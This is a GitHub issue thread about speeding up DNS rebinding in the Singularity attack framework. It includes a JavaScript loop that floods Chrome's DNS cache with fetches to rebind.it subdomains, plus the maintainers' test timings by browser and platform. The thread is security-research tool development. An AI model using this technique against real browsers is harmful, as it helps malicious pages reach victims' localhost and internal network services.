Speeding up "First then Second"
Closed this issue · 6 comments
Hello,
in the paper "FireDrill: Interactive DNS Rebinding" the authors worked out than DNS Rebinding could be accelerated by flooding the DNS-cache of the browser. So instead of waiting for the pinned entries to expire, we can flood the cache with valid entries.
For example, the cache size of the chrome browser is about 1000 entries. Because of this I integrated the following loop in the payload.js file.
var i;
for(i=0; i < 1000; i++){
const url = "http://n"+i+".rebind.it";
fetch(url)
}
With this loop I could perform the "first then second" attack in ~5seconds. I successfully tested this with Chrome Browser, IP=127.0.0.1 and interval = 1s.
I cannot reproduce this test successfully. We had this feature in previous versions of Singularity and then removed it. Can you please provide more details about your test? Chrome version, OS and version? Do you clear the Chrome DNS cache before running the test? Did you place this snippet of code within the global scope of payload.js?
We re-introduced DNS cache flooding as an advanced option in the Singularity Manager UI. In one test environment, it reduced the rebinding time from ~60s to ~20s for Google Chrome only, using the "first then second" DNS rebinding attack strategy and with an interval of 1s.
Successfully tested cache eviction with the following platforms:
- Chrome/macos: ~20s
- Chrome/windows 7: ~30s
It does not work on Firefox/all platforms. Chromium on Linux in a VM seems to hang.
Nice, thank you!
It is deployed on rebind.it (http://rebind.it:8080/manager.html) if you want to experiment with it.